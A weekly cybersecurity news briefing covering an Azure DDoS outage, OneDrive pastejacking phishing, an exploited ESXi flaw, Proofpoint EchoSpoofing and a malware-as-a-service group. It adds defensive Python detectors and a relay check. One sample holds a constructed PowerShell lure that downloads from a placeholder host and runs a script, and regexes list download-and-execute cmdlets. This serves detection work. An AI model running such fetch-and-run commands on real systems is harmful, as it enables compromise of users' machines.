Cyber Security Briefing, 27 July - 2 August

August 2, 2024

Microsoft Azure suffers DDoS attack

Microsoft has confirmed that the incident that paralyzed and interrupted several of the company's services worldwide, including Microsoft 365 and Azure, was caused by a distributed denial of service (DDoS) attack. According to Microsoft's statement, the attack, whose attribution is unknown at the moment, was the initial trigger, and its impact was amplified by a possible error in the implementation of the company's own defense measures, which appear to have worsened the disruption instead of mitigating it.

The incident lasted approximately 10 hours, so numerous companies across different sectors that depend on these services were affected. Microsoft has indicated that it will publish a preliminary analysis of the incident within 72 hours and a more detailed review within two weeks.

More info

Phishing campaign "OneDrive Pastejacking" targeting Microsoft OneDrive

Cybersecurity researchers at Trellix have detected a new phishing campaign, dubbed "OneDrive Pastejacking", targeting Microsoft OneDrive users in the United States, South Korea, Germany, India, Ireland, Italy, Norway and the United Kingdom. Its goal is to get users, through social engineering, to execute a malicious PowerShell script themselves.

The attack begins with an email carrying an HTML attachment. When opened, the file displays an image that imitates a OneDrive page together with error code 0x8004de80, a real error code used by the application, and claims that the user must manually update the DNS cache to fix it, offering instructions to do so. A user who follows them is walked through a series of steps that culminate in opening PowerShell and pasting a Base64-encoded command that supposedly fixes the problem but in fact runs the attackers' script.
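The last step of that chain is visible on the endpoint: the pasted command arrives as a Base64 -EncodedCommand argument to a PowerShell process that the user launched interactively. The Python triage routine below is an added example, not code from Trellix or from the campaign. It decodes the argument the way powershell.exe does (UTF-16LE, accepting the bare -e or any unambiguous prefix of -EncodedCommand) and flags download-and-execute behaviour in the decoded script together with evasion switches on the outer command line. The process-creation records and the lure script are constructed for illustration and do not reproduce the real payload; the host name and paths are placeholders.

```python
"""Triage PowerShell process-creation records for a pasted Base64 -EncodedCommand
that downloads and runs something, the shape of a 'pastejacking' lure.
Added example; the sample records and the lure script below are constructed."""
import base64
import binascii
import re

# powershell.exe accepts the bare -e plus any unambiguous prefix of -EncodedCommand
# (-en, -enc, ... -encodedcommand); -ex would be -ExecutionPolicy, so it is excluded.
_NAME = "encodedcommand"
ENCODED_FLAGS = {"e"} | {_NAME[:i] for i in range(2, len(_NAME) + 1)}

# Behaviours worth flagging in the decoded script. These are scanned only on the
# decoded text: \b-bounded words such as iex could otherwise match inside Base64.
SCRIPT_INDICATORS = {
    "download": re.compile(
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile"
        r"|Start-BitsTransfer|Net\.WebClient", re.I),
    "execute": re.compile(r"Invoke-Expression|\biex\b|Start-Process|Expand-Archive", re.I),
    "dns_pretext": re.compile(r"ipconfig\s*/flushdns|Clear-DnsClientCache", re.I),
}
# Switches on the outer command line; '-' is not in the Base64 alphabet, so these
# cannot fire inside the encoded blob.
CMDLINE_INDICATORS = {
    "evasion": re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|ExecutionPolicy\s+Bypass", re.I),
}


def extract_encoded_command(cmdline):
    """Return the decoded script carried by -EncodedCommand (or a prefix of it), else None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag[:1] in "-/" and flag[1:].lower() in ENCODED_FLAGS:
            try:
                # PowerShell expects Base64 over the UTF-16LE bytes of the script.
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def classify(event):
    """Decode one record and decide whether it looks like a pasted download-and-run command."""
    decoded = extract_encoded_command(event["cmdline"])
    if decoded is None:
        return {"encoded": False, "decoded": None, "indicators": [], "suspicious": False}
    hits = [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(decoded)]
    hits += [name for name, rx in CMDLINE_INDICATORS.items() if rx.search(event["cmdline"])]
    # A victim who pasted the command opened the shell from the desktop (Win+X menu,
    # Start menu or a terminal), not from a scheduler or a service.
    interactive = event.get("parent", "").lower() in {"explorer.exe", "windowsterminal.exe"}
    suspicious = "download" in hits and ("execute" in hits or interactive)
    return {"encoded": True, "decoded": decoded, "indicators": hits,
            "interactive": interactive, "suspicious": suspicious}


def encode_for_powershell(script):
    """Produce the argument powershell.exe -EncodedCommand expects (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples. The lure follows the pretext described above (flush the DNS
# cache, then fetch and run a 'fix'); fix.example.invalid and the paths are placeholders.
LURE = ("ipconfig /flushdns; "
        "Invoke-WebRequest 'http://fix.example.invalid/dnsfix.zip' -OutFile $env:TEMP\\dnsfix.zip; "
        "Expand-Archive $env:TEMP\\dnsfix.zip $env:TEMP\\dnsfix; & $env:TEMP\\dnsfix\\run.ps1")
BENIGN = "Get-ChildItem $env:USERPROFILE\\Documents | Measure-Object"
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
                + encode_for_powershell(LURE)},
    {"id": 2, "parent": "explorer.exe",
     "cmdline": "powershell.exe -enc " + encode_for_powershell(BENIGN)},
    {"id": 3, "parent": "svchost.exe", "cmdline": "powershell.exe -File C:\\ops\\inventory.ps1"},
]


def triage(events=SAMPLE_EVENTS):
    """Classify every record, keyed by its id."""
    return {ev["id"]: classify(ev) for ev in events}


if __name__ == "__main__":
    for eid, result in triage().items():
        print(eid, "SUSPICIOUS" if result["suspicious"] else "ok", result["indicators"])
```

Only the first record is flagged: the second is an encoded but harmless command, the third is a scripted run with no encoded argument. In production the same logic would sit on Sysmon event 1 or Security event 4688 command lines, with PowerShell script block logging (event 4104) as a second source once the decoded script executes.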

More info

Vulnerability in ESXi hypervisors exploited to deploy ransomware

A recently disclosed vulnerability in ESXi hypervisors is reportedly being exploited by ransomware groups. According to Microsoft, the flaw, CVE-2024-37085 (CVSSv3 6.8 per VMware), is an authentication bypass that allows attackers who already hold sufficient Active Directory permissions to gain full administrative access to the hypervisor, from which they can encrypt the host, access the virtual machines and move laterally. Microsoft reported the vulnerability to VMware, which released patches; nevertheless, actors such as Storm-0506, Storm-1175, Octo Tempest and Manatee Tempest have reportedly exploited the flaw in multiple attacks. Specifically, the researchers observed the attackers running a series of commands to create a new domain group named "ESX Admins", which domain-joined ESXi hosts trust with full administrative rights by default, and on several occasions the intrusions culminated in the deployment of Akira and Black Basta ransomware.
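Because the weakness is that a domain-joined ESXi host trusts whatever group carries the name "ESX Admins", the high-signal telemetry lives in the domain controllers' Security log rather than on the hypervisor: a security group being created with that name (events 4727/4731/4754), an existing group being changed or renamed to it (4737/4735/4755) or members being added to it (4728/4732/4756). The routine below is an added example, not Microsoft's or VMware's code. It runs that logic over constructed Security-log records, modelled as plain dicts of the relevant EventData fields, and escalates when the same account adds a member shortly after creating or renaming the group. The group name is a parameter so the check can follow the `Config.HostAgent.plugins.hostsvc.esxAdminsGroup` host setting where an organisation has changed it; the case-insensitive, whitespace-trimmed match is the detector's own choice.

```python
"""Spot creation, renaming or population of the 'ESX Admins' domain group in
Windows Security-log records. Added example; the sample records are constructed."""
from datetime import datetime, timedelta

# Global / local / universal security-group variants of each event.
GROUP_CREATED = {4727, 4731, 4754}
GROUP_CHANGED = {4737, 4735, 4755}   # SamAccountName carries the new name on a rename
MEMBER_ADDED = {4728, 4732, 4756}


def _norm(name):
    """Normalise a group name for comparison (case-insensitive, trimmed)."""
    return (name or "").strip().lower()


def find_esx_admins_activity(events, group_name="ESX Admins", window=timedelta(minutes=30)):
    """Return findings for events that create, change into, or add members to group_name.

    A member add by the same account within `window` of creating or renaming the
    group is escalated to critical: that is the CVE-2024-37085 pattern end to end.
    """
    target = _norm(group_name)
    staged = {}      # subject account -> time it created/renamed the group
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        eid, subject = ev["EventID"], ev["SubjectUserName"]
        if eid in GROUP_CREATED and _norm(ev["TargetUserName"]) == target:
            staged[subject] = ts
            findings.append({"time": ev["TimeCreated"], "action": "group_created",
                             "subject": subject, "severity": "high"})
        elif eid in GROUP_CHANGED and target in {_norm(ev.get("SamAccountName")),
                                                 _norm(ev["TargetUserName"])}:
            # Either a rename to the name (new name in SamAccountName) or a change
            # to a group that already carries it.
            staged[subject] = ts
            findings.append({"time": ev["TimeCreated"], "action": "group_changed",
                             "subject": subject, "group": ev["TargetUserName"],
                             "severity": "high"})
        elif eid in MEMBER_ADDED and _norm(ev["TargetUserName"]) == target:
            recent = subject in staged and ts - staged[subject] <= window
            findings.append({"time": ev["TimeCreated"], "action": "member_added",
                             "subject": subject, "member": ev["MemberName"],
                             "severity": "critical" if recent else "high"})
    return findings


# Constructed records: one account creates ESX Admins and adds itself seconds later,
# another renames a helpdesk group to it hours later, and an unrelated group is
# created and populated normally.
SAMPLE_EVENTS = [
    {"EventID": 4727, "TimeCreated": "2024-07-29T02:14:05", "SubjectUserName": "svc-backup",
     "TargetUserName": "ESX Admins", "TargetDomainName": "CORP", "SamAccountName": "ESX Admins"},
    {"EventID": 4728, "TimeCreated": "2024-07-29T02:14:09", "SubjectUserName": "svc-backup",
     "TargetUserName": "ESX Admins", "TargetDomainName": "CORP",
     "MemberName": "CN=svc-backup,OU=Service,DC=corp,DC=local"},
    {"EventID": 4737, "TimeCreated": "2024-07-29T05:40:00", "SubjectUserName": "jdoe",
     "TargetUserName": "Helpdesk-L2", "TargetDomainName": "CORP", "SamAccountName": "esx admins"},
    {"EventID": 4727, "TimeCreated": "2024-07-29T09:00:00", "SubjectUserName": "admin.alice",
     "TargetUserName": "Finance-Readers", "TargetDomainName": "CORP",
     "SamAccountName": "Finance-Readers"},
    {"EventID": 4728, "TimeCreated": "2024-07-29T09:00:30", "SubjectUserName": "admin.alice",
     "TargetUserName": "Finance-Readers", "TargetDomainName": "CORP",
     "MemberName": "CN=bob,OU=Users,DC=corp,DC=local"},
]

if __name__ == "__main__":
    for f in find_esx_admins_activity(SAMPLE_EVENTS):
        print(f["time"], f["severity"].upper(), f["action"], f["subject"])
```

The three findings are the two svc-backup events (the second escalated to critical) and the rename by jdoe; the Finance-Readers events produce nothing. On the hypervisor side, the complementary control after patching is to disable the automatic trust with `Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd` or point `esxAdminsGroup` at a group that actually exists and is tightly controlled.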

More info

Proofpoint Misconfiguration Exploited in Massive Phishing Campaign

A massive phishing campaign has recently come to light in which threat actors exploited a misconfiguration in Proofpoint's email protection service. Dubbed EchoSpoofing, the flaw allowed them to send millions of perfectly authenticated and signed phishing emails that impersonated Proofpoint's customers, including well-known companies and brands such as Disney, IBM, Nike, Best Buy and Coca-Cola, by routing them through Microsoft Exchange.

According to Guardio Labs, the attackers used Office 365 accounts under their control and took advantage of Proofpoint's permissive relay settings, which accepted mail from any Office 365 tenant as if it came from the customer. The phishing emails were generated on the attackers' virtual servers and sent through Office 365 and then through Proofpoint, which made them look genuine. In addition, the attackers used the impersonated brand's unique Proofpoint identifier, obtained from its public MX record, to route the mail through the right relay. The campaign began in January 2024 and sent up to 14 million emails per day. Proofpoint was notified in May and stated that it had been aware of the issue since March and had deployed mitigations and alerted its customers. However, many of the Office 365 accounts used in the attack have still not been remediated.
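The structural weakness is that the relay authorised "any Office 365 tenant" rather than the customer's own tenant, so a message whose From: domain belonged to the brand was signed regardless of who actually submitted it. The check below is an added example, not Proofpoint's or Guardio's code; it binds the relay decision to the originating tenant through an allowlist per customer domain and shows the weak From:-only rule beside it. It assumes the relay accepts connections only from Exchange Online and that Exchange Online stamps the sending tenant in the X-OriginatorOrg header, which is the header such a policy would key on; the policy table and the messages are constructed.

```python
"""Per-tenant relay authorisation for outbound mail arriving from Exchange Online.
Added example; the policy and the messages below are constructed, not captured traffic."""
from email import message_from_string
from email.utils import parseaddr

# Which Exchange Online tenants may relay (and get signed) as which customer domain.
# Constructed policy: only the brand's own tenant identities.
RELAY_POLICY = {
    "brand.example": {"brand.example", "brand.onmicrosoft.com"},
}


def _from_domain(msg):
    """Domain of the RFC 5322 From: address, lower-cased ('' if unparsable)."""
    _, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def originating_tenant(msg):
    """Tenant named in X-OriginatorOrg, or None if the header is absent or duplicated."""
    values = msg.get_all("X-OriginatorOrg") or []
    if len(values) != 1:          # missing, or more than one copy: do not guess
        return None
    return values[0].strip().lower()


def permissive_decision(raw_message, policy=RELAY_POLICY):
    """The weak rule the campaign abused: relay if From: is a customer domain, whoever sent it."""
    msg = message_from_string(raw_message)
    from_domain = _from_domain(msg)
    if from_domain in policy:
        return "accept", f"{from_domain} is a customer domain (sender not checked)"
    return "reject", f"{from_domain or '<none>'} is not a customer domain"


def relay_decision(raw_message, policy=RELAY_POLICY):
    """Hardened rule: the submitting tenant must be authorised for the From: domain."""
    msg = message_from_string(raw_message)
    from_domain = _from_domain(msg)
    allowed = policy.get(from_domain)
    if allowed is None:
        return "reject", f"{from_domain or '<none>'} is not a customer domain"
    tenant = originating_tenant(msg)
    if tenant is None:
        return "reject", "originating tenant missing or ambiguous"
    if tenant not in allowed:
        return "reject", f"tenant {tenant} is not authorised to send as {from_domain}"
    return "accept", f"tenant {tenant} authorised for {from_domain}"


# Constructed samples (headers abridged to what the decision uses).
LEGIT = """\
X-OriginatorOrg: brand.example
From: Brand Newsletter <news@brand.example>
To: customer@example.net
Subject: July newsletter

Hello from the brand.
"""

SPOOF = """\
X-OriginatorOrg: attacker-tenant.onmicrosoft.com
From: Brand Support <support@brand.example>
To: victim@example.net
Subject: Action required on your account

Please sign in here.
"""

NO_TENANT = """\
From: Brand Support <support@brand.example>
To: victim@example.net
Subject: Action required on your account

Please sign in here.
"""

OTHER_BRAND = """\
X-OriginatorOrg: brand.example
From: Someone Else <ceo@otherbrand.example>
To: victim@example.net
Subject: Hi

Hi.
"""

if __name__ == "__main__":
    for name, raw in [("legit", LEGIT), ("spoof", SPOOF), ("no tenant", NO_TENANT), ("other brand", OTHER_BRAND)]:
        print(f"{name:12s} permissive={permissive_decision(raw)[0]:7s} hardened={relay_decision(raw)}")
```

The spoof is exactly the EchoSpoofing shape: a valid Exchange Online submission from a tenant the brand does not own, with the brand in From:. The permissive rule accepts it; the hardened rule rejects it, and also refuses to sign when the tenant header is missing or duplicated rather than falling back to the From: check.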

More info

GXC Team: Spanish-speaking malicious actor following MaaS model

The Group-IB research team has published a report analyzing GXC Team, a Spanish-speaking threat actor offering Malware as a Service (MaaS). The actor was discovered in September 2023, although it appears to have been active since January of that year. Its services target Spanish banks as well as government agencies and institutions worldwide.

GXC Team offers its clients a combination of phishing kits and Android malware that steals SMS one-time passwords (OTPs). The highlight of the service, however, is an AI-powered phishing-as-a-service platform capable of generating voice calls to victims based on input supplied by the operator. Group-IB warns that, although the tools themselves are not very sophisticated, GXC Team's innovative features pose a threat to the Spanish banking sector.

More info